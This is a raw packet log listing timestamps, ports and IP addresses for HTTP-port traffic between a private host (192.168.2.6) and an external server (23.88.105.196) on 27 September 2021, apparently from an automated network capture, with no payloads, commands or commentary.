Sep 27, 2021 18:33:08.799984932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799988031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799989939 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799993992 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799995899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799999952 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.800003052 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.800005913 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.800008059 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.800010920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.812571049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812632084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812663078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812685013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812705040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812725067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812757015 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.812762022 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812789917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.812864065 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.812865019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.812913895 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813188076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813225031 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813261986 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813261032 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813287973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813297033 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813309908 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813333035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813335896 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813357115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813380957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813391924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813405037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813425064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813431025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813458920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813463926 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813487053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813509941 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813519001 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813534021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813556910 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813566923 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813579082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813602924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813604116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813632011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813647985 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813657999 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813676119 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813682079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813704967 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813720942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813726902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813746929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.813762903 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.813791990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.814848900 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815036058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815146923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815170050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815188885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815190077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815212011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815223932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815237045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815262079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815277100 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815282106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815308094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815313101 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815330982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815340042 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815351963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815371990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815390110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815428972 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815466881 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815490007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815522909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815526962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815540075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815562963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815565109 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815609932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815747023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815767050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815779924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815808058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815814018 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815829039 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815845966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815846920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815862894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815876961 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815884113 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815908909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815917015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815927029 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.815931082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815963984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.815983057 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816014051 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816088915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816112041 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816131115 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816147089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816149950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816169024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816179991 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816185951 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816212893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816222906 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816231966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816248894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816251040 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816282034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816292048 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816303015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816309929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.816332102 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.816418886 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817027092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817054987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817142963 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817261934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817287922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817303896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817323923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817327023 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817342043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817358017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817373991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817383051 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817390919 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817418098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817421913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817434072 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817437887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817454100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817471981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817486048 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817492008 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817509890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817521095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817526102 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817543983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817555904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817559958 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817583084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817593098 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817605019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817626953 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817626953 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817651033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817655087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817673922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817696095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817703962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817718029 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817739964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817747116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817760944 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817784071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817785025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817810059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817812920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817837000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817859888 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817861080 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817883968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817909002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817909002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817930937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817951918 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817953110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817975998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.817981958 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.817996025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818022013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818034887 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818044901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818063974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818068027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818084002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818104029 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818105936 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818124056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818131924 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818145990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818166018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818175077 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818190098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818212032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818217993 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818232059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818252087 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818253994 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818270922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818285942 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818291903 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818314075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818326950 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818334103 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818356037 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818366051 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818377018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818397045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818399906 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818417072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818437099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818439960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818458080 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818476915 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818476915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818497896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818506002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818517923 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.818543911 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.818582058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.819170952 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.827259064 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.061364889 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.082881927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.082918882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.082945108 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.082966089 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.082987070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083010912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083035946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083053112 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083074093 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083085060 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083096981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083146095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083156109 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083164930 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083173990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083200932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083214045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083225012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083237886 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083250046 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083271980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083281040 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083296061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083317995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083337069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083339930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083364010 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083384037 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083388090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083411932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083422899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083440065 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083450079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083466053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083477020 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083481073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083497047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083512068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083527088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083544970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083556890 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083561897 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083584070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083604097 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083623886 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083625078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083646059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083667994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083681107 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083692074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083714962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083720922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083735943 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083756924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083759069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083780050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083797932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083800077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083822012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083833933 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083843946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083869934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083890915 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083893061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083915949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083936930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083946943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.083957911 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083978891 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.083990097 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084033966 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084043026 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084068060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084088087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084106922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084144115 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084177971 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084191084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084202051 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084225893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084249020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084254980 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084271908 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084294081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084311962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084316015 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084337950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084355116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084359884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084383011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084392071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084424973 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084439993 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084476948 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084480047 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084500074 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084521055 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084541082 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084541082 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084568024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084579945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084592104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084613085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084635019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084638119 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084659100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.084677935 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.084681034 CEST	80	49741	23.88.105.196	192.168.2.6
